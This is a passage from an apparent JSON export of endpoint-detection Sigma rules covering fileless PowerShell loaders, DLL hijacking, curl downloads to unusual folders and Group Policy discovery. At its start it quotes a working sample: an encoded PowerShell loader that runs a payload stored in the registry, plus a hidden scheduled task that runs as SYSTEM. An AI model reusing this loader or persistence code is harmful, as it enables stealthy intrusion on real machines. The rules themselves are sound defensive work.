OwAkAHMAMwBjAGoAVABoACAAPQAgAFsASQBuAHQAUAB0AHIAXQAoACQAbwA3AGQANgBGAG4AMQA3ADkAYQAuAFQAbwBJAG4AdAA2ADQAKAApACsAJABNAHYAaABEADYAVABuAE8AaQBTACkAOwAkAGcAVAByAGgAVgB6AHoAIAA9ACAAYwBOAEUAUwBRAGkAIABAACgAWwBJAG4AdABQAHQAcgBdACwAIABbAEkAbgB0AFAAdAByAF0AKQAgACgAWwBWAG8AaQBkAF0AKQA7ACQASQBwAHQAagB4AG8AdQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAcwBoAGEAbABdADoAOgBHAGUAdABEAGUAbABlAGcAYQB0AGUARgBvAHIARgB1AG4AYwB0AGkAbwBuAFAAbwBpAG4AdABlAHIAKAAkAHMAMwBjAGoAVABoACwAIAAkAGcAVAByAGgAVgB6AHoAKQA7ACQAZABNAEsAVQBiAE4AOgA6AFMAZQB0AEUAcgByAG8AcgBNAG8AZABlACgAMAB4ADgAMAAwADYAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAkAEkAcAB0AGoAeABvAHUALgBJAG4AdgBvAGsAZQAoACQAegBxAG8AdABXAG8AawAsACAAJABvADcAZAA2AEYAbgAxADcAOQBhACkAOwB9AGYAdQBuAGMAdABpAG8AbgAgAHEAbABlADMAbQBzAHEAKAAkAGwAbQBJAGoAWQBXAFMAWgAsACAAJABoADUAMQAyAEoAdQA0ADUAKQAgAHsAJABOAEgAMgBTAGQAIAA9ACAATgBVAEEAbABHAEMAWABwAGcAIAAkAGwAbQBJAGoAWQBXAFMAWgAgADEAOwAkAEMAcgB2AHIARQBDACAAPQAgADUAOwB3AGgAaQBsAGUAIAAoACQAQwByAHYAcgBFAEMAKwA4ACAALQBsAHQAIAAkAE4ASAAyAFMAZAApACAAewAkAGQAdAB6AHMAMwA0ADYAWAAgAD0AIAAkAGwAbQBJAGoAWQBXAFMAWgBbACQAQwByAHYAcgBFAEMAXQA7ACQAagBtAEoAVQBrADYAZABGACAAPQAgAE4AVQBBAGwARwBDAFgAcABnACAAJABsAG0ASQBqAFkAVwBTAFoAIAAoACQAQwByAHYAcgBFAEMAKwAxACkAOwAkAHEATwBOAHEATQBaACAAPQAgAE4AVQBBAGwARwBDAFgAcABnACAAJABsAG0ASQBqAFkAVwBTAFoAIAAoACQAQwByAHYAcgBFAEMAKwA1ACkAOwAkAEMAcgB2AHIARQBDACAAKwA9ACAAOQA7AGkAZgAgACgAJABkAHQAegBzADMANAA2AFgAIAAtAGUAcQAgACQAaAA1ADEAMgBKAHUANAA1ACkAIAB7AEQASwBQAEQATQBLACAAJABsAG0ASQBqAFkAVwBTAFoAWwAkAEMAcgB2AHIARQBDAC4ALgAoACQAQwByAHYAcgBFAEMAKwAkAGoAbQBKAFUAawA2AGQARgApAF0AIAAkAHEATwBOAHEATQBaACAAJABsAG0ASQBqAFkAVwBTAFoAOwBiAHIAZQBhAGsAOwB9ACAAZQBsAHMAZQAgAHsAJABDAHIAdgByAEUAQwAgACsAPQAgACQAagBtAEoAVQBrADYAZABGADsAfQB9AH0AJABoAEcAZQAzAFgAIAA9ACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgAkAFoAaABTAGsAeABXACIAIAAtAE4AYQBtAGUAIAAiACQARQBHAEgAUgBYAGUAbAAyACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQAuACQARQBHAEgAUgBYAGUAbAAyADsAaQBmACAAKAAhACQAaABHAGUAMwBYACkAIAB7ACQAaABHAGUAMwBYACAAPQAgACIAIgA7AGYAbwByACAAKAAkAEMAcgB2AHIARQBDAD0AMAA7ACAAJABrAGwAcgA4AGUAQwBsADIAMgA9ACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIAJABaAGgAUwBrAHgAVwAiACAALQBOAGEAbQBlACAAIgAkAEUARwBIAFIAWABlAGwAMgAtACQAQwByAHYAcgBFAEMAIgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQApAC4AIgAkAEUARwBIAFIAWABlAGwAMgAtACQAQwByAHYAcgBFAEMAIgA7ACAAJABDAHIAdgByAEUAQwArACsAKQAgAHsAJABoAEcAZQAzAFgAIAArAD0AIAAkAGsAbAByADgAZQBDAGwAMgAyAC4AVAByAGkAbQAoACkAOwB9AH0AJABsAG0ASQBqAFkAVwBTAFoAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaABHAGUAMwBYACkAOwAkAGwAbQBJAGoAWQBXAFMAWgBbADAAXQAgAD0AIAAwADsAaQBmACAAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQAgAHsAcQBsAGUAMwBtAHMAcQAgACQAbABtAEkAagBZAFcAUwBaACAAMgA7AH0AIABlAGwAcwBlACAAewBxAGwAZQAzAG0AcwBxACAAJABsAG0ASQBqAFkAVwBTAFoAIAAxADsAfQBTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAgAC0ARgBvAHIAYwBlACAAJABQAEkARAA7AA==\";$bYW7kz = New-Object -ComObject Schedule.Service;$bYW7kz.Connect();$Uyd3zfK8wH = $bYW7kz.NewTask(0);$Uyd3zfK8wH.Settings.Priority = 6;$Uyd3zfK8wH.Settings.Hidden = $true;$Uyd3zfK8wH.Settings.Enabled = $true;If ($c85X2z -eq 0) {$SSG3IclKIY = $Uyd3zfK8wH.Triggers.Create(8);} ElseIf ($c85X2z -eq 1) {$SSG3IclKIY = $Uyd3zfK8wH.Triggers.Create(1);$SSG3IclKIY.StartBoundary = (Get-Date).ToString(\"s\");$SSG3IclKIY.Repetition.Interval = \"PT2H5M\"}$z1py83At = $Uyd3zfK8wH.Actions.Create(0);$z1py83At.Path = Join-Path $psHome \"PowerShell.exe\";$z1py83At.Arguments = \" -NonInteractive -WindowStyle Hidden -EncodedCommand $cAQNi\";$chrOzZ1S = $bYW7kz.GetFolder(\"\");$chrOzZ1S.RegisterTaskDefinition($dANHP8T,$Uyd3zfK8wH,6,\"SYSTEM\",$null,5,$null);\n CommandLine|contains:\n # New-Object -ComObject Schedule.Service;\n - 'PQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAUwBjAGgAZQBkAHUAbABlAC4AUwBlAHIAdgBpAGMAZQA7A'\n - '0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBDAG8AbQBPAGIAagBlAGMAdAAgAFMAYwBoAGUAZAB1AGwAZQAuAFMAZQByAHYAaQBjAGUAOw'\n - '9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIABTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlADsA'\n\n selection_child_2:\n CommandLine|contains:\n # .StartBoundary = (Get-Date).ToString(\"s\");\n - 'LgBTAHQAYQByAHQAQgBvAHUAbgBkAGEAcgB5ACAAPQAgACgARwBlAHQALQBEAGEAdABlACkALgBUAG8AUwB0AHIAaQBuAGcAKAAiAHMAIgApADsA'\n - '4AUwB0AGEAcgB0AEIAbwB1AG4AZABhAHIAeQAgAD0AIAAoAEcAZQB0AC0ARABhAHQAZQApAC4AVABvAFMAdAByAGkAbgBnACgAIgBzACIAKQA7A'\n - 'uAFMAdABhAHIAdABCAG8AdQBuAGQAYQByAHkAIAA9ACAAKABHAGUAdAAtAEQAYQB0AGUAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACIAcwAiACkAOw'\n\n selection_child_3:\n CommandLine|contains:\n # -NonInteractive -WindowStyle Hidden -EncodedCommand $\n - 'IAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgACQA'\n - 'AALQBOAG8AbgBJAG4AdABlAHIAYQBjAHQAaQB2AGUAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAkA'\n - 'gAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAJA'\n\n condition: selection_powershell and ((all of selection_loader_*) or (all of selection_child_*))\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "71c03cb7-362d-4076-95e6-72f3834cdd23",
"rule_name": "Generic Malicious PowerShell Payload Detected",
"rule_description": "Detects suspicious PowerShell command-line arguments used by an unknown fileless malware that reads an additional payload from the registry.\nAdversaries may use encoded PowerShell cmdlets to deploy staged payloads.\nIt is recommended to check for malicious actions by child and parent processes of PowerShell and to look for other suspicious activities on the host.\n",
"rule_creation_date": "2021-12-20",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1106"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "721cf2be-8e21-4cb8-88ed-5f813feeee18",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075836Z",
"creation_date": "2026-03-23T11:45:34.075838Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075842Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vsgraphicsdesktopengine.yml",
"content": "title: DLL Hijacking via vsgraphicsdesktopengine.exe\nid: 721cf2be-8e21-4cb8-88ed-5f813feeee18\ndescription: |\n Detects potential Windows DLL Hijacking via vsgraphicsdesktopengine.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vsgraphicsdesktopengine.exe'\n ImageLoaded|endswith:\n - '\\d2d1.dll'\n - '\\d3d11.dll'\n - '\\devobj.dll'\n - '\\version.dll'\n - '\\webservices.dll'\n - '\\xmllite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "721cf2be-8e21-4cb8-88ed-5f813feeee18",
"rule_name": "DLL Hijacking via vsgraphicsdesktopengine.exe",
"rule_description": "Detects potential Windows DLL Hijacking via vsgraphicsdesktopengine.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "728eca4f-f506-46e0-bd7e-6369503a3ec2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088302Z",
"creation_date": "2026-03-23T11:45:34.088304Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088308Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_forfiles.yml",
"content": "title: DLL Hijacking via forfiles.exe\nid: 728eca4f-f506-46e0-bd7e-6369503a3ec2\ndescription: |\n Detects potential Windows DLL Hijacking via forfiles.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'forfiles.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "728eca4f-f506-46e0-bd7e-6369503a3ec2",
"rule_name": "DLL Hijacking via forfiles.exe",
"rule_description": "Detects potential Windows DLL Hijacking via forfiles.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7291c7c2-bf8d-4a9e-82ef-2b0feb135ca5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617687Z",
"creation_date": "2026-03-23T11:45:34.617689Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617693Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_curl_download_susp_folder.yml",
"content": "title: File Downloaded to a Suspicious Folder via curl\nid: 7291c7c2-bf8d-4a9e-82ef-2b0feb135ca5\ndescription: |\n Detects a curl command-line containing an uncommon folder path.\n Attackers may download payloads to these folders to try to avoid detection or to have their payload deleted on reboot.\n It is recommended to investigate files that were downloaded, and to analyze the process that executed the curl command to determine whether this action was legitimate.\nreferences:\n - https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2024/06/20\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - classification.macOS.Source.Filesystem\n - classification.macOS.LOLBin.Curl\n - classification.macOS.Behavior.FileDownload\n - classification.macOS.Behavior.CommandAndControl\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection:\n ProcessImage|endswith: '/curl'\n Path|startswith:\n - '/Users/shared/'\n - '/private/var/tmp'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n Kind:\n - 'create'\n - 'rename'\n\n exclusion_jamf:\n - ProcessAncestors|contains: '/usr/local/jamf/bin/jamf'\n - ProcessParentCommandLine|contains: '/Library/Application Support/JAMF/tmp/'\n\n exclusion_avast:\n ProcessParentCommandLine|startswith: '/bin/bash /Applications/Avast.app/Contents/Backend/scripts/update/shepherd.sh'\n\n exclusion_lua:\n ProcessCommandLine: 'curl -sSL -D /tmp/plenary_curl_????????.headers -X POST -H Content-Type: application/json -d @/tmp/lua_?????? http://*:*/exa.language_server_pb.LanguageServerService/*'\n Path: '/private/tmp/plenary_curl_????????.headers'\n\n exclusion_adode:\n ProcessParentImage|endswith: '/AcroInstallAlert.app/Contents/MacOS/AcroInstallAlert'\n ProcessCommandLine: 'usr/bin/curl -H Cache-Control: no-cache https://acroipm2.adobe.com/assets/installer/osx/DC/installpings_c/scamini/entryPackage/preinstall/'\n\n exclusion_homebrew:\n ProcessParentImage|startswith: '/opt/homebrew/'\n\n exclusion_nix:\n ProcessImage|startswith: '/nix/store/'\n Path|startswith: /private/tmp/nix-build-'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7291c7c2-bf8d-4a9e-82ef-2b0feb135ca5",
"rule_name": "File Downloaded to a Suspicious Folder via curl",
"rule_description": "Detects a curl command-line containing an uncommon folder path.\nAttackers may download payloads to these folders to try to avoid detection or to have their payload deleted on reboot.\nIt is recommended to investigate files that were downloaded, and to analyze the process that executed the curl command to determine whether this action was legitimate.\n",
"rule_creation_date": "2024-06-20",
"rule_modified_date": "2025-03-07",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7296ec56-8aef-43db-aa54-6ef122690e39",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082578Z",
"creation_date": "2026-03-23T11:45:34.082580Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082585Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rstrui.yml",
"content": "title: DLL Hijacking via rstrui.exe\nid: 7296ec56-8aef-43db-aa54-6ef122690e39\ndescription: |\n Detects potential Windows DLL Hijacking via rstrui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rstrui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\ktmw32.dll'\n - '\\SPP.dll'\n - '\\SRCORE.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7296ec56-8aef-43db-aa54-6ef122690e39",
"rule_name": "DLL Hijacking via rstrui.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rstrui.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "729fe232-6628-4198-8f7f-d0a755c02c73",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605796Z",
"creation_date": "2026-03-23T11:45:34.605799Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605807Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md#atomic-test-5---msft-get-gpo-cmdlet",
"https://attack.mitre.org/techniques/T1615/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1615_group_policy_discovery_powershell.yml",
"content": "title: Group Policy Information Discovered via PowerShell\nid: 729fe232-6628-4198-8f7f-d0a755c02c73\ndescription: |\n Detects the access to group policy information using Get-GPO PowerShell cmdlet.\n Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment.\n It is recommended to investigate the process responsible for the GPO discovery to look for malicious content or other suspicious actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md#atomic-test-5---msft-get-gpo-cmdlet\n - https://attack.mitre.org/techniques/T1615/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/12/26\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1615\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_cmdlet:\n PowershellCommand|contains: 'Get-GPO '\n\n selection_arg:\n PowershellCommand|contains:\n - ' -Do '\n - ' -Dom '\n - ' -Doma '\n - ' -Domai '\n - ' -Domain '\n\n exclusion_lepide:\n ProcessParentImage:\n - '?:\\Program Files (x86)\\Lepide Data Security Platform\\GPELMPro.exe'\n - '?:\\Program Files (x86)\\Lepide Data Security Platform\\FSA\\LepideELMProPerm.exe'\n PowershellCommand|contains: '; Get-GPO -GUID '\n\n # https://support.microsoft.com/en-gb/topic/ms14-025-vulnerability-in-group-policy-preferences-could-allow-elevation-of-privilege-may-13-2014-60734e15-af79-26ca-ea53-8cd617073c30\n exclusion_ms14:\n PowershellCommand|contains|all:\n - 'Function Enum-SettingsWithCpassword'\n - '# GPMC tree paths'\n - '# Recursively obtain all the xml files within the SYVOL location'\n - '# Build GPO name from GUID extracted from filePath'\n - 'Get-GPO -Guid $gpoGuid'\n\n # https://www.powershellgallery.com/packages/GPOZaurr/0.0.155/Content/GPOZaurr.psm1\n exclusion_gpozaurr:\n - PowershellCommand|contains|all:\n - '$GroupPolicies = Get-GPO @getGPOSplat'\n - 'Get-GPOZaurr - Processing '\n - PowershellScriptPath:\n - '?:\\Program Files\\WindowsPowerShell\\Modules\\GPOZaurr\\\\*\\GPOZaurr.psm1'\n - 